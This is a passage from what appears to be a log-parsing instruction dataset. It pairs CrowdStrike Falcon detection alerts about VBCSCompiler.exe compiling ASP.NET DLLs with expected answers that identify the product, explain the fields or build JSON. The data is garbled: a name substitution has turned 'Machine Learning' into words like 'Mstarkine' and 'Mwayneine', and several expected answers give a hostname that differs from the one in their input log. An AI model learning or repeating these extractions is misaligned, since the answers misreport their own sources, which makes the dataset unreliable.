"severitylabel": "warning",
"sourceinfo": "unknown",
"starttimeutc": "2023-10-18T15:34:44Z",
"tags": [
"Crowdstrike Detection",
"endpoint_protection_event"
],
"streamName": "Crowdstrike Detection",
"clientIP": "95.100.116.230",
"userName": "johndoe"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: message={"device_id":"99994fe08640433a925c1d14d7175b2b","timestamp":"2023-10-18T15:34:44Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:johndoe.F.Z_dua+xQpvLuzUtnGY1TVjD6x\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Mstarkine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Mstarkine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor mstarkine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\App_Web_jjafca5y.dll","user_name":"johndoe","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1290","control_graph_id":"ctg:99994fe08640433a925c1d14d7175b2b:77309819454","triggering_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761467075508","sha256":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\uprfi4r5.cmdline\"","parent_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761464850144"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=95.100.116.230 ::: fileHash=4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\UAT_Greer\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=johndoe ::: clientMAC=0a3ab18031e1 ::: created_at=2023-10-18T15:34:44Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-18T15:34:44Z ::: clientHostname=NVISAASUATWEB01.devnvi.starkint.com ::: pipelineEntrypoint=dispatch | Product: Falcon
Vendor: Crowdstrike | Identify this syslog message |
WitFoo-Artifact ::: message={"device_id":"99994fe08640433a925c1d14d7175b2b","timestamp":"2023-10-18T15:34:44Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:johndoe.F.Z_dua+xQpvLuzUtnGY1TVjD6x\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Mstarkine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Mstarkine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor mstarkine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\App_Web_jjafca5y.dll","user_name":"johndoe","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1290","control_graph_id":"ctg:99994fe08640433a925c1d14d7175b2b:77309819454","triggering_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761467075508","sha256":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\uprfi4r5.cmdline\"","parent_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761464850144"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mstarkine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=95.100.116.230 ::: fileHash=4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\UAT_Greer\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=johndoe ::: clientMAC=0a3ab18031e1 ::: created_at=2023-10-18T15:34:44Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-18T15:34:44Z ::: clientHostname=NVISAASUATWEB01.devnvi.starkint.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message:
clienthostname: NVISAASUATWEB01.devnvi.paygoint.com
clientmac: 0a3ab18031e1
filehash: 4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9
filename: VBCSCompiler.exe
filepath: \Device\HarddiskVolume3\PayGo\UAT_Greer\Portal\bin\roslyn\VBCSCompiler.exe
messagetype: endpoint_protection_event
productids: [7]
senderhost: kafka.precinct
sensitivity: normal
severitycode: 4
severitylabel: warning
sourceinfo: unknown
starttimeutc: 2023-10-18T15:34:44Z
tags: ['Crowdstrike Detection', 'endpoint_protection_event']
streamName: Crowdstrike Detection
clientIP: 95.100.116.230
userName: johndoe | Explain this syslog message |
WitFoo-Artifact ::: message={"device_id":"99994fe08640433a925c1d14d7175b2b","timestamp":"2023-10-18T15:34:44Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:bob.F.Z_dua+xQpvLuzUtnGY1TVjD6x\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Macmeine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Macmeine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor macmeine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\App_Web_jjafca5y.dll","user_name":"bob","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1290","control_graph_id":"ctg:99994fe08640433a925c1d14d7175b2b:77309819454","triggering_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761467075508","sha256":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\uprfi4r5.cmdline\"","parent_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761464850144"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_macmeine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=23.107.77.180 ::: fileHash=4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\UAT_Greer\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=bob ::: clientMAC=0a3ab18031e1 ::: created_at=2023-10-18T15:34:44Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-18T15:34:44Z ::: clientHostname=NVISAASUATWEB01.devnvi.acmeint.com ::: pipelineEntrypoint=dispatch | {
"clienthostname": "NVISAASUATWEB01.devnvi.paygoint.com",
"clientmac": "0a3ab18031e1",
"filehash": "4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9",
"filename": "VBCSCompiler.exe",
"filepath": "\\Device\\HarddiskVolume3\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe",
"message": "WitFoo-Artifact ::: message={\"device_id\":\"99994fe08640433a925c1d14d7175b2b\",\"timestamp\":\"2023-10-18T15:34:44Z\",\"behavior_id\":\"5737\",\"filename\":\"VBCSCompiler.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\PayGo\\\\UAT_Greer\\\\Portal\\\\bin\\\\roslyn\\\\VBCSCompiler.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"D:\\\\PayGo\\\\UAT_Greer\\\\Portal\\\\bin\\\\roslyn\\\\VBCSCompiler.exe\\\" \\\"-pipename:bob.F.Z_dua+xQpvLuzUtnGY1TVjD6x\\\"\",\"scenario\":\"NGAV\",\"objective\":\"Falcon Detection Method\",\"tactic\":\"Macmeine Learning\",\"tactic_id\":\"CSTA0004\",\"technique\":\"Sensor-based ML\",\"technique_id\":\"CST0007\",\"display_name\":\"Macmeine Learning Identified Medium Confidence Malicious File\",\"description\":\"A file written to the file system meets the on-sensor macmeine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.\",\"severity\":50,\"confidence\":50,\"ioc_type\":\"hash_sha256\",\"ioc_value\":\"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9\",\"ioc_source\":\"file_write\",\"ioc_description\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\Temporary ASP.NET Files\\\\portal\\\\6fc660c9\\\\a8ee7210\\\\App_Web_jjafca5y.dll\",\"user_name\":\"bob\",\"user_id\":\"S-1-5-21-1959957726-1537299114-1298153393-1290\",\"control_graph_id\":\"ctg:99994fe08640433a925c1d14d7175b2b:77309819454\",\"triggering_process_graph_id\":\"pid:99994fe08640433a925c1d14d7175b2b:761467075508\",\"sha256\":\"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9\",\"md5\":\"\",\"parent_details\":{\"parent_sha256\":\"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d\",\"parent_md5\":\"7dc642657b7cb790d687332f6d18feae\",\"parent_cmdline\":\"\\\"D:\\\\PayGo\\\\UAT_Greer\\\\Portal\\\\bin\\\\roslyn\\\\csc.exe\\\" /shared /keepalive:\\\"10\\\" /noconfig /fullpaths @\\\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\Temporary ASP.NET Files\\\\portal\\\\6fc660c9\\\\a8ee7210\\\\uprfi4r5.cmdline\\\"\",\"parent_process_graph_id\":\"pid:99994fe08640433a925c1d14d7175b2b:761464850144\"},\"pattern_disposition\":128,\"pattern_disposition_details\":{\"indicator\":false,\"detect\":false,\"inddet_mask\":false,\"sensor_only\":false,\"rooting\":false,\"kill_process\":false,\"kill_subprocess\":false,\"quarantine_macmeine\":false,\"quarantine_file\":true,\"policy_disabled\":false,\"kill_parent\":false,\"operation_blocked\":false,\"process_blocked\":false,\"registry_operation_blocked\":false,\"critical_process_disabled\":false,\"bootup_safeguard_enabled\":false,\"fs_operation_blocked\":false,\"handle_operation_downgraded\":false,\"kill_action_failed\":false,\"blocking_unsupported_or_disabled\":false,\"suspend_process\":false,\"suspend_parent\":false}} ::: clientIP=23.107.77.180 ::: fileHash=4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9 ::: fileName=VBCSCompiler.exe ::: filePath=\\Device\\HarddiskVolume3\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe ::: userName=bob ::: clientMAC=0a3ab18031e1 ::: created_at=2023-10-18T15:34:44Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-18T15:34:44Z ::: clientHostname=NVISAASUATWEB01.devnvi.acmeint.com ::: pipelineEntrypoint=dispatch",
"messagetype": "endpoint_protection_event",
"productids": [
7
],
"senderhost": "kafka.precinct",
"sensitivity": "normal",
"severitycode": 4,
"severitylabel": "warning",
"sourceinfo": "unknown",
"starttimeutc": "2023-10-18T15:34:44Z",
"tags": [
"Crowdstrike Detection",
"endpoint_protection_event"
],
"streamName": "Crowdstrike Detection",
"clientIP": "23.107.77.180",
"userName": "bob"
} | Create a JSON artifact from the message |
WitFoo-Artifact ::: message={"device_id":"99994fe08640433a925c1d14d7175b2b","timestamp":"2023-10-18T15:34:44Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:bob.F.Z_dua+xQpvLuzUtnGY1TVjD6x\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Macmeine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Macmeine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor macmeine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\App_Web_jjafca5y.dll","user_name":"bob","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1290","control_graph_id":"ctg:99994fe08640433a925c1d14d7175b2b:77309819454","triggering_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761467075508","sha256":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\uprfi4r5.cmdline\"","parent_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761464850144"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_macmeine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=23.107.77.180 ::: fileHash=4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\UAT_Greer\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=bob ::: clientMAC=0a3ab18031e1 ::: created_at=2023-10-18T15:34:44Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-18T15:34:44Z ::: clientHostname=NVISAASUATWEB01.devnvi.acmeint.com ::: pipelineEntrypoint=dispatch | Product: Falcon
Vendor: Crowdstrike | Identify this syslog message |
WitFoo-Artifact ::: message={"device_id":"99994fe08640433a925c1d14d7175b2b","timestamp":"2023-10-18T15:34:44Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:bob.F.Z_dua+xQpvLuzUtnGY1TVjD6x\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Macmeine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Macmeine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor macmeine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\App_Web_jjafca5y.dll","user_name":"bob","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1290","control_graph_id":"ctg:99994fe08640433a925c1d14d7175b2b:77309819454","triggering_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761467075508","sha256":"4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\UAT_Greer\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6fc660c9\\a8ee7210\\uprfi4r5.cmdline\"","parent_process_graph_id":"pid:99994fe08640433a925c1d14d7175b2b:761464850144"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_macmeine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=23.107.77.180 ::: fileHash=4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\UAT_Greer\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=bob ::: clientMAC=0a3ab18031e1 ::: created_at=2023-10-18T15:34:44Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-10-18T15:34:44Z ::: clientHostname=NVISAASUATWEB01.devnvi.acmeint.com ::: pipelineEntrypoint=dispatch | This is a syslog message from a product called Falcon by Crowdstrike. The following fields were extracted from the message:
clienthostname: NVISAASUATWEB01.devnvi.paygoint.com
clientmac: 0a3ab18031e1
filehash: 4a5c38f64a2bfa8ce166f206f855e2be05899973c4cf01e37ae3f7eea6b902a9
filename: VBCSCompiler.exe
filepath: \Device\HarddiskVolume3\PayGo\UAT_Greer\Portal\bin\roslyn\VBCSCompiler.exe
messagetype: endpoint_protection_event
productids: [7]
senderhost: kafka.precinct
sensitivity: normal
severitycode: 4
severitylabel: warning
sourceinfo: unknown
starttimeutc: 2023-10-18T15:34:44Z
tags: ['Crowdstrike Detection', 'endpoint_protection_event']
streamName: Crowdstrike Detection
clientIP: 23.107.77.180
userName: bob | Explain this syslog message |
WitFoo-Artifact ::: message={"device_id":"289d83eb622a40d58196e54957152b03","timestamp":"2023-08-25T11:20:20Z","behavior_id":"5737","filename":"VBCSCompiler.exe","filepath":"\\Device\\HarddiskVolume3\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe","alleged_filetype":"exe","cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe\" \"-pipename:johndoe.F.A34eygCs1aJfPpzR6O_cjJw2t\"","scenario":"NGAV","objective":"Falcon Detection Method","tactic":"Mwayneine Learning","tactic_id":"CSTA0004","technique":"Sensor-based ML","technique_id":"CST0007","display_name":"Mwayneine Learning Identified Medium Confidence Malicious File","description":"A file written to the file system meets the on-sensor mwayneine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.","severity":50,"confidence":50,"ioc_type":"hash_sha256","ioc_value":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","ioc_source":"file_write","ioc_description":"\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\App_Web_kvvwjyjq.dll","user_name":"johndoe","user_id":"S-1-5-21-1959957726-1537299114-1298153393-1249","control_graph_id":"ctg:289d83eb622a40d58196e54957152b03:60130083149","triggering_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770815250147","sha256":"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5","md5":"","parent_details":{"parent_sha256":"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d","parent_md5":"7dc642657b7cb790d687332f6d18feae","parent_cmdline":"\"D:\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\csc.exe\" /shared /keepalive:\"10\" /noconfig /fullpaths @\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Temporary ASP.NET Files\\portal\\6e657b17\\3c955147\\pqwjm4kv.cmdline\"","parent_process_graph_id":"pid:289d83eb622a40d58196e54957152b03:770812509131"},"pattern_disposition":128,"pattern_disposition_details":{"indicator":false,"detect":false,"inddet_mask":false,"sensor_only":false,"rooting":false,"kill_process":false,"kill_subprocess":false,"quarantine_mwayneine":false,"quarantine_file":true,"policy_disabled":false,"kill_parent":false,"operation_blocked":false,"process_blocked":false,"registry_operation_blocked":false,"critical_process_disabled":false,"bootup_safeguard_enabled":false,"fs_operation_blocked":false,"handle_operation_downgraded":false,"kill_action_failed":false,"blocking_unsupported_or_disabled":false,"suspend_process":false,"suspend_parent":false}} ::: clientIP=91.202.71.43 ::: fileHash=1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5 ::: fileName=VBCSCompiler.exe ::: filePath=\Device\HarddiskVolume3\PayGo\QA_SRP_Latest\Portal\bin\roslyn\VBCSCompiler.exe ::: userName=johndoe ::: clientMAC=0accca51756b ::: created_at=2023-08-25T11:20:20Z ::: streamName=Crowdstrike Detection ::: messageType=endpoint_protection_event ::: pipelineName=Crowdstrike Detection ::: severityCode=4 ::: startTimeUTC=2023-08-25T11:20:20Z ::: clientHostname=NVISAASQATWEB01.devnvi.wayneint.com ::: pipelineEntrypoint=dispatch | {
"clienthostname": "NVISAASQATWEB01.devnvi.paygoint.com",
"clientmac": "0accca51756b",
"filehash": "1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5",
"filename": "VBCSCompiler.exe",
"filepath": "\\Device\\HarddiskVolume3\\PayGo\\QA_SRP_Latest\\Portal\\bin\\roslyn\\VBCSCompiler.exe",
"message": "WitFoo-Artifact ::: message={\"device_id\":\"289d83eb622a40d58196e54957152b03\",\"timestamp\":\"2023-08-25T11:20:20Z\",\"behavior_id\":\"5737\",\"filename\":\"VBCSCompiler.exe\",\"filepath\":\"\\\\Device\\\\HarddiskVolume3\\\\PayGo\\\\QA_SRP_Latest\\\\Portal\\\\bin\\\\roslyn\\\\VBCSCompiler.exe\",\"alleged_filetype\":\"exe\",\"cmdline\":\"\\\"D:\\\\PayGo\\\\QA_SRP_Latest\\\\Portal\\\\bin\\\\roslyn\\\\VBCSCompiler.exe\\\" \\\"-pipename:johndoe.F.A34eygCs1aJfPpzR6O_cjJw2t\\\"\",\"scenario\":\"NGAV\",\"objective\":\"Falcon Detection Method\",\"tactic\":\"Mwayneine Learning\",\"tactic_id\":\"CSTA0004\",\"technique\":\"Sensor-based ML\",\"technique_id\":\"CST0007\",\"display_name\":\"Mwayneine Learning Identified Medium Confidence Malicious File\",\"description\":\"A file written to the file system meets the on-sensor mwayneine learning medium confidence threshold for malicious files. Detection is based on a high degree of entropy, packing, anti-malware evasion, or other similarity to known malware.\",\"severity\":50,\"confidence\":50,\"ioc_type\":\"hash_sha256\",\"ioc_value\":\"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5\",\"ioc_source\":\"file_write\",\"ioc_description\":\"\\\\Device\\\\HarddiskVolume1\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\Temporary ASP.NET Files\\\\portal\\\\6e657b17\\\\3c955147\\\\App_Web_kvvwjyjq.dll\",\"user_name\":\"johndoe\",\"user_id\":\"S-1-5-21-1959957726-1537299114-1298153393-1249\",\"control_graph_id\":\"ctg:289d83eb622a40d58196e54957152b03:60130083149\",\"triggering_process_graph_id\":\"pid:289d83eb622a40d58196e54957152b03:770815250147\",\"sha256\":\"1ce7339d5637cc12a82bb8c64dc223ccb637a888cb641446c01229d1512df5d5\",\"md5\":\"\",\"parent_details\":{\"parent_sha256\":\"29fc4e96f2553c5c309ee321a18ee5ad18686b5586e64422c1a7870748ce908d\",\"parent_md5\":\"7dc642657b7cb790d687332f6d18feae\",\"parent_cmdline\":\"\\\"D:\\\\PayGo\\\\QA_SRP_Latest\\\\Portal\\\\bin\\\\roslyn\\\\csc.exe\\\" /shared /keepalive:\\\"10\\\" /noconfig /fullpaths @\\\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\Temporary ASP.NET 